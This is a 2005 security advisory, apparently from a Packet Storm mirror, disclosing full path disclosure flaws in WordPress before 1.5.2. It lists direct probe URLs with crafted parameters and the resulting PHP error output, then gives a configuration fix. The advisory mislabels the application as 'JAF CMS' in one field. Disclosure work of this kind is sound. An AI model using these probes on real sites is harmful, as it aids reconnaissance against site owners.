exploit the possibilities

Echo Security Advisory 2005.24

Echo Security Advisory 2005.24
Posted Dec 28, 2005
Authored by Echo Security, Dedi Dwianto | Site echo.or.id

WordPress versions less than 1.5.2 suffer from a full path disclosure vulnerability.

tags | advisory
MD5 | 06118e0c87cf9f9e5f727be23604892e

Echo Security Advisory 2005.24

Change Mirror Download
ECHO.OR.ID
ECHO_ADV_24$2005

---------------------------------------------------------------------------
[ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2
---------------------------------------------------------------------------

Author: Dedi Dwianto
Date: Dec, 20th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv24-theday-2005.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : JAF CMS
version: < 1.5.2
URL : http://wordpress.org/
Description :

WordPress is a very popular personal publishing platform aka blog
software, and is used by everyone from celebrities, to government
officials, to non technical average joe's.
---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Full path disclosure:

A remote user can access the file directly to cause the system to display
an error message that indicates the installation path. The resulting error
message will disclose potentially sensitive installation path information
to the remote attacker.

* http://victim/[WP Folder]/wp-includes/vars.php?PHP_SELF%20=dudul

POC :

http://localhost/blog/wp-includes/vars.php?PHP_SELF%20=dudul

Fatal error: Call to undefined function: get_settings() in
/var/www/html/blog/wp-includes/vars.php on line 106


* http://victim/[WP Folder]/wp-content/plugins/hello.php

POC :

http://localhost/blog/wp-content/plugins/hello.php

Fatal error: Call to undefined function: wptexturize() in
/var/www/html/blog/wp-content/plugins/hello.php on line 44


* http://victim/[WP Folder]/wp-admin/menu-header.php?self=dudul

POC :

http://localhost/blog/wp-admin/menu-header.php?self=dudul

PHP Fatal error: Call to undefined function: get_admin_page_parent() in
/var/www/html/blog/wp-admin/menu-header.php on line 6
Fatal error: Call to undefined function: get_admin_page_parent() in
/var/www/html/blog/wp-admin/menu-header.php on line 6


* http://victim/[WP Folder]/wp-admin/upgrade-functions.php

POC :

http://localhost/[WP Folder]/wp-admin/upgrade-functions.php

Warning: main(ABSPATH/wp-admin/admin-functions.php): failed to open stream: No such file or directory
in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3
PHP Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php'
(include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3
Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php'
(include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3


* http://victim/[WP FOlder]/wp-admin/edit-form.php

POC :

http://localhost/blog/wp-admin/edit-form.php

PHP Fatal error: Call to undefined function: _e() in /var/www/html/blog/wp-admin/edit-form.php on line 3
Fatal error: Call to undefined function: _e() in /var/www/html/blog/wp-admin/edit-form.php on line 3

* http://victim/[WP FOlder]/wp-settings.php


POC : http://localhost/blog/wp-settings.php

Warning: main(ABSPATHwp-includes/wp-db.php): failed to open stream: No such file or directory in
/var/www/html/blog/wp-settings.php on line 59
PHP Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php'
(include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-settings.php on line 59
Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php'
(include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-settings.php on line 59


* http://victim/[WP FOlder]/wp-admin/edit-form-comment.php

POC :

http://localhost/blog/wp-admin/edit-form-comment.php

Fatal error: Call to undefined function: __() in /var/www/html/blog/wp-admin/edit-form-comment.php on line 2


B. Fix

For User and do not know how to fix the script , change php.ini file setting
then turn on log_errors , and turn off display_error

---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ newbie_hacker@yahoogroups.com
~ #e-c-h-o@DALNET

---------------------------------------------------------------------------
Contact:
~~~~~~~~

the_day || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    35 Files
  • 8
    Jul 8th
    4 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close